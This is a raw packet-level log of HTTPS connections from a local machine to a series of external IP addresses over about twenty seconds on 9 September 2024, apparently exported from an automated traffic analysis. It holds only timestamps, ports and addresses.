                                                              Sep 9, 2024 12:07:27.228493929 CEST4434975495.130.22.108192.168.2.4
                                                              Sep 9, 2024 12:07:27.228559017 CEST49754443192.168.2.495.130.22.108
                                                              Sep 9, 2024 12:07:27.228573084 CEST4434975495.130.22.108192.168.2.4
                                                              Sep 9, 2024 12:07:27.228604078 CEST49754443192.168.2.495.130.22.108
                                                              Sep 9, 2024 12:07:27.228626966 CEST49754443192.168.2.495.130.22.108
                                                              Sep 9, 2024 12:07:27.228813887 CEST49754443192.168.2.495.130.22.108
                                                              Sep 9, 2024 12:07:27.253895998 CEST49755443192.168.2.4192.0.78.13
                                                              Sep 9, 2024 12:07:27.253931999 CEST44349755192.0.78.13192.168.2.4
                                                              Sep 9, 2024 12:07:27.254014969 CEST49755443192.168.2.4192.0.78.13
                                                              Sep 9, 2024 12:07:27.254304886 CEST49755443192.168.2.4192.0.78.13
                                                              Sep 9, 2024 12:07:27.254316092 CEST44349755192.0.78.13192.168.2.4
                                                              Sep 9, 2024 12:07:27.683778048 CEST49755443192.168.2.4192.0.78.13
                                                              Sep 9, 2024 12:07:28.515908003 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.515953064 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:28.516030073 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.516390085 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.516408920 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:28.987168074 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:28.987370968 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.988746881 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.988756895 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:28.988964081 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:28.990246058 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.990287066 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:28.990292072 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:29.127284050 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:29.127345085 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:29.127460003 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:29.127789974 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:29.127789974 CEST49756443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:29.127810001 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:29.127818108 CEST44349756188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:29.147273064 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.147315979 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:29.147488117 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.147666931 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.147681952 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:29.614238977 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:29.614322901 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.616070032 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.616076946 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:29.616281033 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:29.617348909 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:29.660509109 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329241037 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329284906 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329308987 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329335928 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329375029 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329392910 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.329411030 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329421997 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.329457045 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.329911947 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.329962969 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.330013037 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.330020905 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.334033966 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.334086895 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.334099054 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.382587910 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.382595062 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416054010 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416089058 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416120052 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416122913 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.416132927 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416172981 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.416541100 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416577101 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416591883 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.416599035 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416640997 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.416646957 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416708946 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.416754961 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.416762114 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417426109 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417458057 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417478085 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.417490005 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417526007 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417541981 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.417547941 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417576075 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417596102 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.417603970 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.417640924 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.418360949 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.418427944 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.418461084 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.418473005 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.418478966 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.418519974 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.418526888 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.459148884 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.459213972 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.459222078 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.502954006 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.502985954 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503021002 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503027916 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503036022 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503072023 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503081083 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503125906 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503132105 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503145933 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503191948 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503200054 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503246069 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503261089 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503268957 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503314972 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.503323078 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.503360987 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.504122019 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.504179955 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.504185915 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.504229069 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.504271030 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.504319906 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.504331112 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:30.504344940 CEST49757443192.168.2.4172.67.158.62
                                                              Sep 9, 2024 12:07:30.504348993 CEST44349757172.67.158.62192.168.2.4
                                                              Sep 9, 2024 12:07:31.018668890 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.018698931 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.018786907 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.019175053 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.019191027 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.483131886 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.483329058 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.485141039 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.485153913 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.485392094 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.486632109 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.486661911 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.486669064 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.583811045 CEST44349758134.209.129.254192.168.2.4
                                                              Sep 9, 2024 12:07:31.583976984 CEST49758443192.168.2.4134.209.129.254
                                                              Sep 9, 2024 12:07:31.875554085 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:31.875591040 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:31.875672102 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:31.876070023 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:31.876082897 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:32.688898087 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:32.689071894 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:32.690294027 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:32.690300941 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:32.690499067 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:32.691530943 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:32.691581964 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:32.691585064 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.039654016 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.039833069 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.039859056 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.039947033 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.039971113 CEST4434975952.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.040018082 CEST49759443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.078165054 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.078195095 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.078277111 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.078617096 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.078633070 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.891380072 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.891499996 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.893089056 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.893099070 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.893302917 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:33.894437075 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:33.936503887 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:34.340136051 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:34.340157986 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:34.340187073 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:34.340213060 CEST4434976052.215.137.200192.168.2.4
                                                              Sep 9, 2024 12:07:34.340323925 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:34.340323925 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:34.378125906 CEST49760443192.168.2.452.215.137.200
                                                              Sep 9, 2024 12:07:34.468095064 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:34.468147993 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:34.468231916 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:34.468488932 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:34.468503952 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:35.137278080 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:35.137454033 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:35.138916969 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:35.138926029 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:35.139130116 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:35.140290976 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:35.140311003 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:35.140317917 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:36.524934053 CEST4434976185.92.72.56192.168.2.4
                                                              Sep 9, 2024 12:07:36.525279045 CEST49761443192.168.2.485.92.72.56
                                                              Sep 9, 2024 12:07:36.542726040 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:36.542756081 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:36.542848110 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:36.543138027 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:36.543147087 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.148853064 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.148984909 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.150629997 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.150640011 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.150839090 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.151952028 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.151981115 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.151984930 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.393044949 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.393148899 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.393310070 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.393354893 CEST49762443192.168.2.423.236.62.147
                                                              Sep 9, 2024 12:07:37.393368006 CEST4434976223.236.62.147192.168.2.4
                                                              Sep 9, 2024 12:07:37.420742989 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:37.420768976 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:37.420844078 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:37.421109915 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:37.421123028 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.051183939 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.051265001 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.052798986 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.052808046 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.053005934 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.054066896 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.054102898 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.054106951 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.667990923 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.668010950 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.668066978 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.668081045 CEST4434976385.10.140.71192.168.2.4
                                                              Sep 9, 2024 12:07:38.668256998 CEST49763443192.168.2.485.10.140.71
                                                              Sep 9, 2024 12:07:38.773855925 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:38.773890972 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:38.773962021 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:38.774238110 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:38.774250984 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.557914972 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.558010101 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.559647083 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.559659004 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.559859991 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.560940981 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.560964108 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.560969114 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.889503002 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.889568090 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:39.889712095 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.890017986 CEST49764443192.168.2.4188.246.227.29
                                                              Sep 9, 2024 12:07:39.890033960 CEST44349764188.246.227.29192.168.2.4
                                                              Sep 9, 2024 12:07:40.021538973 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.021578074 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:40.021656036 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.022048950 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.022062063 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:40.715404987 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:40.715488911 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.716959953 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.716973066 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:40.717180014 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:40.718233109 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.718270063 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:40.718276978 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:41.778337955 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:41.778414965 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:41.778580904 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:41.778626919 CEST49765443192.168.2.4185.68.16.21
                                                              Sep 9, 2024 12:07:41.778644085 CEST44349765185.68.16.21192.168.2.4
                                                              Sep 9, 2024 12:07:41.803906918 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:41.803939104 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:41.804023981 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:41.804320097 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:41.804331064 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.276556015 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.276736021 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.278352022 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.278359890 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.278600931 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.279742002 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.279767036 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.279808044 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.441698074 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.441740990 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.442009926 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.442121983 CEST49766443192.168.2.4188.114.96.3
                                                              Sep 9, 2024 12:07:42.442132950 CEST44349766188.114.96.3192.168.2.4
                                                              Sep 9, 2024 12:07:42.484093904 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:42.484141111 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:42.484241962 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:42.484544992 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:42.484560013 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.105854988 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.106041908 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.107542038 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.107553959 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.107767105 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.108895063 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.108917952 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.108926058 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.348109007 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.348166943 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.348226070 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.348355055 CEST49767443192.168.2.4141.95.251.157
                                                              Sep 9, 2024 12:07:43.348376989 CEST44349767141.95.251.157192.168.2.4
                                                              Sep 9, 2024 12:07:43.396976948 CEST49768443192.168.2.446.242.240.159
                                                              Sep 9, 2024 12:07:43.397016048 CEST4434976846.242.240.159192.168.2.4
                                                              Sep 9, 2024 12:07:43.397109032 CEST49768443192.168.2.446.242.240.159
                                                              Sep 9, 2024 12:07:43.397372961 CEST49768443192.168.2.446.242.240.159
                                                              Sep 9, 2024 12:07:43.397387981 CEST4434976846.242.240.159192.168.2.4
                                                              Sep 9, 2024 12:07:43.678627014 CEST49768443192.168.2.446.242.240.159
                                                              Sep 9, 2024 12:07:43.748307943 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:43.748342037 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:43.748421907 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:43.748759031 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:43.748764038 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.558672905 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.558784962 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.560343981 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.560353041 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.560619116 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.561728001 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.561750889 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.561758041 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.812084913 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.812169075 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.812231064 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.812428951 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.812438965 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:44.812475920 CEST49769443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:44.812485933 CEST4434976935.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:45.542316914 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:45.542350054 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:45.542439938 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:45.542853117 CEST49770443192.168.2.435.214.166.193
                                                              Sep 9, 2024 12:07:45.542865992 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:46.344589949 CEST4434977035.214.166.193192.168.2.4
                                                              Sep 9, 2024 12:07:46.344717979 CEST49770443192.168.2.435.214.166.193
